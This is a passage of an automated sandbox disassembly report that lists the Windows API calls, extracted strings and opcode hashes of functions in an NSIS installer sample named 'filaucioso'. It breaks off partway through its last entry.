                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                        • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                        • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                        • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorModeVersionlstrlen
                                                                        • String ID: $NSIS Error$UXTHEME
                                                                        • API String ID: 758611499-3141987311
                                                                        • Opcode ID: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                        • Instruction ID: 2a398feea240def2510372ba555c9adfae5b6ad84a20a3a993315f833025e39d
                                                                        • Opcode Fuzzy Hash: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                        • Instruction Fuzzy Hash: C731A3B0404341BFE7216F709E09B1B3EA8AB46309F00457EF9C5B62D2DB7C49098B6E
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,00405DED,?,?), ref: 00405C8D
                                                                        • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                          • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                          • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                        • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                        • wsprintfA.USER32 ref: 00405CD1
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?), ref: 00405D0C
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D1B
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D53
                                                                        • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405DC1
                                                                          • Part of subcall function 00405B86: GetFileAttributesA.KERNEL32(00000003,00402E04,007AAC00,80000000,00000003), ref: 00405B8A
                                                                          • Part of subcall function 00405B86: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                        • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                        • Opcode Fuzzy Hash: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                        • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                        • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                        • lstrcmpiA.KERNEL32(007A1EE0,0079F548), ref: 00404674
                                                                        • lstrcatA.KERNEL32(?,007A1EE0), ref: 00404680
                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                          • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,007A9000,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                          • Part of subcall function 00406257: CharNextA.USER32(?,007A9000,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                          • Part of subcall function 00406257: CharPrevA.USER32(?,?,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                        • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,?,0079E518,?,?,000003FB,?), ref: 00404750
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                          • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                          • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                          • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A
                                                                        • API String ID: 2624150263-3554254475
                                                                        • Opcode ID: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                        • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                        • Opcode Fuzzy Hash: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                        • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(007A1EE0,00000400), ref: 0040613A
                                                                        • GetWindowsDirectoryA.KERNEL32(007A1EE0,00000400,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 0040614D
                                                                        • SHGetSpecialFolderLocation.SHELL32(LQ@(y,?,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406189
                                                                        • SHGetPathFromIDListA.SHELL32(?,007A1EE0), ref: 00406197
                                                                        • CoTaskMemFree.OLE32(?), ref: 004061A3
                                                                        • lstrcatA.KERNEL32(007A1EE0,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                        • lstrlenA.KERNEL32(007A1EE0,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406219
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                        • String ID: .$LQ@(y$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                        • API String ID: 717251189-3515046496
                                                                        • Opcode ID: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                        • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                        • Opcode Fuzzy Hash: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                        • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                        • lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                        • lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                        • SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: (y
                                                                        • API String ID: 2531174081-255812342
                                                                        • Opcode ID: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                        • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                        • Opcode Fuzzy Hash: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                        • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8
                                                                        APIs
                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                        • GetSysColor.USER32(00000000), ref: 0040413D
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                        • SetBkMode.GDI32(?,?), ref: 00404155
                                                                        • GetSysColor.USER32(?), ref: 00404168
                                                                        • SetBkColor.GDI32(?,?), ref: 00404178
                                                                        • DeleteObject.GDI32(?), ref: 00404192
                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                        • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                        • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                        • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402F73
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402FD9
                                                                          • Part of subcall function 00402D60: DestroyWindow.USER32(?,00000000,00402F3E,?), ref: 00402D73
                                                                        Strings
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                        • Inst, xrefs: 00402EA9
                                                                        • Null, xrefs: 00402EBB
                                                                        • soft, xrefs: 00402EB2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: AllocDestroyFileGlobalPointerWindow
                                                                        • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                        • API String ID: 1580554587-639894862
                                                                        • Opcode ID: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                        • Instruction ID: a92ccb9d8f619cb80c5c611e8c8ba1d2dc739ca40880e943336e7b39007ee354
                                                                        • Opcode Fuzzy Hash: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                        • Instruction Fuzzy Hash: 7E41C731900216AFDF109F64DA89B9E7B74EB54395F10403BE904B62D1C6BC9E81AB5D
                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                        • GetMessagePos.USER32 ref: 004049F1
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                        • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                        • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                        • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                        APIs
                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00402D23
                                                                        • wsprintfA.USER32 ref: 00402D33
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402D2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                        • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                        • Opcode Fuzzy Hash: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
                                                                        • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                        • wsprintfA.USER32 ref: 00406367
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040637B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-4240819195
                                                                        • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                        • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                        • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                        • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                        • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                        • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                        • Opcode Fuzzy Hash: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
                                                                        • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 551687249-2449383134
                                                                        • Opcode ID: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                        • Instruction ID: 58bd5faada6d9be10f0d72f5de6cba59a90cc667517f98c73a934b571b6f9a01
                                                                        • Opcode Fuzzy Hash: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
                                                                        • Instruction Fuzzy Hash: 23414F71900209EBCB10DF65DA4479E7BB8EF08756F14813BE911BA2E0C7799B41CB9D
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00402095
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                          • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                          • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 004020A5
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040211F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID: /z
                                                                        • API String ID: 2987980305-1190999251
                                                                        • Opcode ID: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                        • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                        • Opcode Fuzzy Hash: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
                                                                        • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E
                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,007A9000,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                        • CharNextA.USER32(?,007A9000,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                        • CharPrevA.USER32(?,?,74DF3410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                        • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
